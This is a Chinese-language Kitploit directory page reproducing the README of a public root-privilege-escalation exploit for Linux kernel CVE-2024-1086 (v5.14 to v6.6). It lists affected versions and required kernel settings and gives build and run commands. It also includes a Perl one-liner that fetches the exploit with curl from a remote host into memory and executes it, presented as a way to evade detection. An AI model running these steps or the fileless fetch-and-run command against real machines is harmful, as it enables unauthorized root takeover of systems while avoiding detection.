Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-1086 | Kitploit
工具/GitHubGitHub/b1nhack/cve-2024-1086
权限提升漏洞分析漏洞利用论文与研究学习与教育二进制利用
GitHubb1nhack/cve-2024-1086

CVE-2024-1086

查看仓库
2个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-1086

针对 CVE-2024-1086 的通用本地权限提升概念验证(Proof-of-Concept)漏洞利用,适用于 v5.14 至 v6.6 之间的大多数 Linux 内核,包括 Debian、Ubuntu 和 KernelCTF。在 KernelCTF 镜像中成功率为 99.4%。

https://github.com/Notselwyn/CVE-2024-1086/assets/68616630/a3d43951-94ab-4c09-a14b-07b81f89b3de

博客文章 / 深入剖析

关于该漏洞利用的完整剖析——包括背景信息和大量实用的示意图——可在 Flipping Pages 博客文章 中找到。

受影响版本

该漏洞利用影响从 v5.14(含)到 v6.6(含)的版本,但不包括已修补的分支 v5.15.149>、v6.1.76>、v6.6.15>。这些版本的补丁于 2024 年 2 月发布。底层漏洞影响从 v3.15 到 v6.8-rc1 的所有版本(不包括已修补的稳定分支)。

注意事项:

  • 该漏洞利用不适用于带有 kconfig CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y 的 v6.4> 内核(包括 Ubuntu v6.5)
  • 该漏洞利用需要用户命名空间(kconfig CONFIG_USER_NS=y),且这些用户命名空间为非特权(sh 命令 sysctl kernel.unprivileged_userns_clone = 1),并且启用了 nf_tables(kconfig CONFIG_NF_TABLES=y)。默认情况下,这些在 Debian、Ubuntu 和 KernelCTF 中都已启用。其他发行版尚未测试,但也可能有效。此外,该漏洞利用仅在 x64/amd64 架构上测试过。
  • 在大量网络活动的系统上,该漏洞利用可能非常不稳定
    • 带有 WiFi 适配器的系统,如果处于高占用 WiFi 网络环境中,将会非常不稳定。
    • 在测试设备上,请通过 BIOS 关闭 WiFi 适配器。
  • 运行漏洞利用后出现的内核 panic(系统崩溃)是一个副作用,故意未修复以阻止该漏洞利用的恶意使用(即利用尝试现在应更加明显,并且在真实世界的操作中不切实际)。尽管如此,它仍然允许在实验室环境中进行有效的概念验证,因为 root shell 可用,并且可以通过磁盘实现持久化。

用法

配置

默认值应能在 Debian、Ubuntu 和 KernelCTF 上使用本地 shell 开箱即用。对于未经测试的环境/发行版,请确保 kconfig 的值与目标内核匹配。这些值可以在 src/config.h 中指定。如果在物理内存超过 32GiB 的机器上运行该漏洞利用,请务必增大 CONFIG_PHYS_MEM。 如果通过 SSH(进入测试机器)或反弹 shell 运行该漏洞利用,你可能需要将 CONFIG_REDIRECT_LOG 切换为 1,以避免不必要的网络活动。

编译

如果这对你来说不切实际,这里有一个带默认配置的已编译 x64 二进制文件。

root@kitploit:~
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make

二进制文件:CVE-2024-1086/exploit

运行

运行该漏洞利用同样简单:

root@kitploit:~
./exploit

还支持无文件执行,适用于需要规避检测的渗透测试场景。不过,目标上需要安装 Perl:

root@kitploit:~
perl -e '
  require qw/syscall.ph/;

  my $fd = syscall(SYS_memfd_create(), $fn, 0);
  system "curl https://example.com/exploit -s >&$fd";
  exec {"/proc/$$/fd/$fd"} "memfd";
'

免责声明

本软件目录/文件夹/仓库(“仓库”)中的程序和脚本(“程序”)仅出于教育/研究目的发布、开发和分发。我(“创建者”)不认可对本仓库中程序的任何恶意或非法使用,因为目的是分享研究而非进行非法活动。对于你使用本仓库中的程序所做的任何事情,我不承担法律责任。

下载工具